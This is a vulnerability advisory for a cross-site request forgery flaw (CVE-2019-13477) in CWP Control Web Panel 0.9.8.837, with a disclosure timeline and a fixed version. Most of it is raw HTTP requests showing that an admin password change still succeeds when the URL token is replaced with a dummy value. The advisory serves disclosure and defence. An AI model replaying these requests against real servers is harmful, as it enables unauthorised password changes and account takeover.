CentOS version 7.6.1810 with Control Web Panel version 0.9.8.837 suffers from a cross site request forgery vulnerability.
3a55ead305dddb7ad30a3b60f204b53f
Cross-Site Request Forgery (CSRF)
# ====================================================================
# Information
# ====================================================================
Product : CWP Control Web Panel
version : 0.9.8.837
Fixed on : 0.9.8.851
Test on : CentOS 7.6.1810 (Core)
Reference : https://control-webpanel.com/
CVE-Number : 2019-13477
Original request
POST /cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/loader_ajax.php?ajax=list_accounts HTTP/1.1
Host: 192.168.75.148:2087
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.75.148:2087/cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/index.php?module=list_accounts
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 50
Connection: close
Cookie: cwpsrv-bad194011f5ad0cf609c77ad222e50d6=53tt3djbnhepcprdbtoc7uc4d2; _firstImpression=true
accion=changePass&pass=UEBzc3cwcmQ=&username=user1
Even the url has token value,but the token only check for pattern "cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
modify the end of the token value
POST /cwp_99999999999999999999999999999999/admin/loader_ajax.php?ajax=list_accounts HTTP/1.1
Host: 192.168.75.148:2087
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.75.148:2087/cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/index.php?module=list_accounts
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 50
Connection: close
Cookie: cwpsrv-bad194011f5ad0cf609c77ad222e50d6=53tt3djbnhepcprdbtoc7uc4d2; _firstImpression=true
accion=changePass&pass=UEBzc3cwcmQ=&username=user1
# ====================================================================
# PoC
# ====================================================================
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13477.md
# ====================================================================
# Timeline
# ====================================================================
2019-06-05: Discovered the bug
2019-06-05: Reported to vendor
2019-06-05: Vender accepted the vulnerability
2019-07-17: The vulnerability has been fixed
2019-08-20: published
# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak